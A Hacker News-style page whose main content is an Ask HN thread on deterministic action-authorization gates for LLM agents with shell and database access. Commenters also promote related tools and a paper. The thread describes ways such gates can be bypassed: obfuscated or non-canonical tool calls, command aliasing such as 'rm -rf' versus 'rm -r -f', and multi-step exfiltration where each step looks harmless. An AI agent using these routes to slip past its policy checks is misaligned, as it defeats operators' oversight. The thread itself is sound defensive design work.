frontpage.
newsnewestaskshowjobs

Made with ♥ by @iamnishanth

Open Source @Github

fp.

Ask HN: What's the current best local/open speech-to-speech setup?

18•dsrtslnd23•12h ago•3 comments

Ask HN: Seeeking help to reverse engineer a PCB

8•Dlg001•16h ago•5 comments

Ask HN: Do you "micro-manage" your agents?

6•xinbenlv•3h ago•4 comments

Ask HN: Why don't winter gloves have mechanical fingers?

2•amichail•1h ago•7 comments

Ask HN: Where is society heading, is there a plan for a jobless future?

4•evo_9•6h ago•4 comments

Dismantling dark patterns using TDD via discovery and injunctions

4•marc_litchfield•3h ago•1 comments

Ask HN: Do B2B deals stall more from "org blindness" than product fit?

5•Tanjim•4h ago•4 comments

Ask HN: What's a good format to submit CSV data for LLMs?

2•JimsonYang•3h ago•3 comments

Tell HN: 2 years building a kids audio app as a solo dev – lessons learned

135•oliverjanssen•2d ago•75 comments

Ask HN: Will agentic AI grow to handle technology leadership responsibilities?

4•gengstrand•4h ago•0 comments

The Cognitive Cockpit: Why I moved my data to a 1-bit e-ink display

3•jerr12939•58m ago•1 comments

Ask HN: Do you have any evidence that agentic coding works?

446•terabytest•3d ago•449 comments

Ask HN: LLMs for new job categories?

4•aavci•6h ago•2 comments

AI hallucinate. Do you ever double check the output?

7•jackota•7h ago•11 comments

Locked out of my GCP account for 3 days, still charged, can't redirect domain

8•lifeoflee•11h ago•2 comments

Working on reducing wasted distribution effort before publishing posts

2•ryujii•5h ago•0 comments

Tell HN: Cloudflare's D1 service degraded since 2 days

3•iowahansen•6h ago•2 comments

Ask HN: Does DDG no longer honor "site:" prefix?

19•everybodyknows•21h ago•6 comments

Ask HN: Room left for the "industrial" systems engineer in a post-cloud world?

2•infraphysics•7h ago•0 comments

Ask HN: Have you seen your Palantir file?

13•roschdal•1h ago•4 comments

Ask HN: Why are so many rolling out their own AI/LLM agent sandboxing solution?

30•ATechGuy•2d ago•13 comments

Ask HN: How are you handling non-probabilistic security for LLM agents?

2•amjadfatmi1•8h ago•4 comments

Ask HN: Best practice securing secrets on local machines working with agents?

8•xinbenlv•1d ago•11 comments

Ask HN: COBOL devs, how are AI coding affecting your work?

168•zkid18•4d ago•183 comments

Ask HN: How realistically far are we from AGI?

2•HipstaJules•9h ago•5 comments

What software businesses worked in the early Internet? Can they work again?

2•tsingy•9h ago•0 comments

Ask HN: Has the macOS design become too iOS-like?

4•Austin_Conlon•3h ago•3 comments

Tell HN: Cursor agent force-pushed despite explicit "ask for permission" rules

6•xinbenlv•17h ago•7 comments

Ask HN: Is Claude Down for You?

26•philip1209•1d ago•19 comments

Ask HN: How do you authorize AI agent actions in production?

5•naolbeyene•1d ago•4 comments
Open in hackernews

Ask HN: How are you handling non-probabilistic security for LLM agents?

2•amjadfatmi1•8h ago
I've been experimenting with autonomous agents that have shell and database access. The standard approach seems to be "put safety guardrails in the system prompt", but that feels like a house of cards honestly. If a model is stochastic, its adherence to security instructions is also stochastic.

I'm looking into building a hard "Action Authorization Boundary" (AAB) that sits outside the agent's context window entirely. The idea is to intecept the tool-call, normalize it into intent against a deterministic YAML policy before execution.

A few questions for those building in this space:

Canonicalization: How do you handle the messiness of LLM tool outputs? If the representation isn't perfectly canonical, the policy bypasses seem trivial.

Stateful Intent: How do you handle sequences that are individually safe but collectively risky? For example, an agent reading a sensitive DB (safe) and then making a POST request to an external API (dangerous exfiltration).

Latency: Does moving the "gate" outside the model-loop add too much overhead for real-time agentic workflows?

I’ve been working on a CAR (Canonical Action Representation) spec to solve this, but I’m curious if I'm overthinking it or if there’s an existing firewall for agents standard I'm missing.

Comments

yaront111•7h ago
i just built Cordum.io .. should give u 100% deterministic security open sourced and free :)
amjadfatmi1•6h ago
Hey @yaront111, Cordum looks like a solid piece of infrastructure especially the Safety Kernel and the NATS based dispatch.

My focus with Faramesh.dev is slightly upstream from the scheduler. I’m obsessed with the Canonicalization problem. Most schedulers take a JSON payload and check a policy, but LLMs often produce semantic tool calls that are messy or obfuscated.

I’m building CAR (Canonical Action Representation) to ensure that no matter how the LLM phrases the intent, the hash is identical. Are you guys handling the normalization of LLM outputs inside the Safety Kernel, or do you expect the agent to send perfectly formatted JSON every time?

yaront111•6h ago
That’s a sharp observation. You’re partially right CAP (our protocol) handles the structural canonicalization. We use strict Protobuf/Schematic definitions, so if an agent sends a messy JSON that doesn't fit the schema, it’s rejected at the gateway. We don't deal with 'raw text' tool calls in the backend. But you are touching on the semantic aliasing problem (e.g. rm -rf vs rm -r -f), which is a layer deeper. Right now, we rely on the specific Worker to normalize those arguments before they hit the policy check, but having a universal 'Canonical Action Representation' upstream would be cleaner. If you can turn 'messy intent' into a 'deterministic hash' before it hits the Cordum Scheduler, that would be a killer combo. Do you have a repo/docs for CAR yet?
amjadfatmi1•6h ago
Spot on, Yaron. Schematic validation (Protobuf) catches structural errors, but semantic aliasing (the 'rm -rf' vs 'rm -r -f' problem) is exactly why I developed the CAR (Canonical Action Representation) spec.

I actually published a 40-page paper (DOI: 10.5281/zenodo.18296731) that defines this exact 'Action Authorization Boundary.' It treats the LLM as an untrusted actor and enforces determinism at the execution gate.

Faramesh Core is the reference implementation of that paper. I’d love for you to check out the 'Execution Gate Flow' section. it would be a massive win to see a Faramesh-Cordum bridge that brings this level of semantic security to your orchestrator.

Code: https://github.com/faramesh/faramesh-core